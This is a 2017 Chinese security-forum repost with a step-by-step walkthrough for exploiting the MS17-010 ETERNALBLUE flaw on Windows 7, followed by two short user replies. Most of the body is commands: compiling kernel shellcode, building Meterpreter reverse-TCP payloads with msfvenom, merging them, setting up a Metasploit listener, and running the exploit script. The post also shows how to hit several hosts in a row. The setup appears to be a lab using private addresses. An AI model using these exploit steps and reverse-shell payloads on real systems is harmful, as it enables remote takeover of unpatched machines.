搜索
查看: 1024|回复: 2

使用PentestBox工具利用ETERNALBLUE对Win7进行攻击,获取Meterpreter反弹

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2017-8-17 22:39:28 | 显示全部楼层 |阅读模式
转自:http://fuping.site/2017/08/16/HO ... LBLUE-ON-WINDOWS-7/

前言
MS17-010已经过去很久了,利用PentestBox的方式也提到过,但都是基于python2.6那种方式实现的。本文将使用Sleepya的脚本利用ETERNALBLUE来实现对Win7进行攻击,从而获取Meterpreter反弹。
靶机为Windows 7,IP为192.168.131.133。攻击机为Win10系统,安装了PentestBox,IP为192.168.217.1。
脚本下载地址https://github.com/worawit/MS17-010
漏洞利用测试1.安装NASM
下载地址:http://www.nasm.us/pub/nasm/releasebuilds/ ,我这里用的是2.13
然后开始安装。
2.下载利用脚本,并编译内核shellcode
  1. git clone [url]https://github.com/worawit/MS17-010[/url]
复制代码
编译内核shellcode
  1. cd MS17-010/shellcode/
  2. nasm -f bin eternalblue_kshellcode_x64.asm
  3. nasm -f bin eternalblue_kshellcode_x86.asm
复制代码
3.生成反弹exp
  1. msfvenom -p windows/meterpreter/reverse_tcp  EXITFUNC=thread LHOST=192.168.217.1 LPORT=4445 -f raw -o ../../Git/MS17-010/shellcode/sc_x86_msf.bin
  2. msfvenom -p windows/x64/meterpreter/reverse_tcp  EXITFUNC=thread LHOST=192.168.217.1 LPORT=4444 -f raw -o ../../Git/MS17-010/shellcode/sc_x64_msf.bin
复制代码
4.合并SHELLCODE
  1. cat eternalblue_kshellcode_x64 sc_x64_msf.bin > sc_x64.bin
  2. cat eternalblue_kshellcode_x86 sc_x86_msf.bin > sc_x86.bin
  3. python eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin
复制代码
5.开启Metasploit并监听
  1. msf > use exploit/multi/handler
  2. msf exploit(handler) > set ExitOnSession false
  3. msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
  4. msf exploit(handler) > set EXITFUNC thread
  5. msf exploit(handler) > set LHOST 192.168.217.1
  6. msf exploit(handler) > set LPORT 4444
  7. msf exploit(handler) > exploit -j
  8. ...
  9. msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
  10. msf exploit(handler) > set LPORT 4445
  11. msf exploit(handler) > exploit -j
复制代码
6.进行攻击
  1. python eternalblue_exploit7.py 192.168.131.133 shellcodesc_all.bin
复制代码
遇到的问题
在PentestBox中运行一些命令时(如msfconsole),提示不是内部或外部命令,也不是可运行的程序或批处理文件。
解决方法:输入cmd之后再输入需要执行的命令。
[/url]
总结
1.这种方式利用稍微简单点,不需要过多的命令,而且生成的SHELLCODE也具有复用性。
2.在以上的操作中,均生成了32位和64位的shellcode,最后利用eternalblue_sc_merge脚本合并到一起。然后在Eternalblue漏洞中利用合并的shellcode可以支持x86和x64,无需再检测目标体系结构。
3.在使用中设置了线程,可以同时对多个系统进行攻击测试。
例如:
  1. python eternalblue_exploit7.py 192.168.131.133 shellcodesc_all.bin
  2. python eternalblue_exploit7.py 192.168.131.134 shellcodesc_all.bin
  3. python eternalblue_exploit7.py 192.168.131.135 shellcodesc_all.bin
  4. python eternalblue_exploit7.py 192.168.131.136 shellcodesc_all.bin
复制代码
参考

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
过段时间可能会取消签到功能了

1

主题

11

帖子

31

积分

我是新手

Rank: 1

积分
31
发表于 2017-8-18 22:05:54 | 显示全部楼层
没什么意义的转过来还加了自己的水印。不懂站长

0

主题

6

帖子

80

积分

我是新手

Rank: 1

积分
80
发表于 2017-8-22 22:15:37 | 显示全部楼层
PentestBox 里面的msf 可以升级到最新的版本么????
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表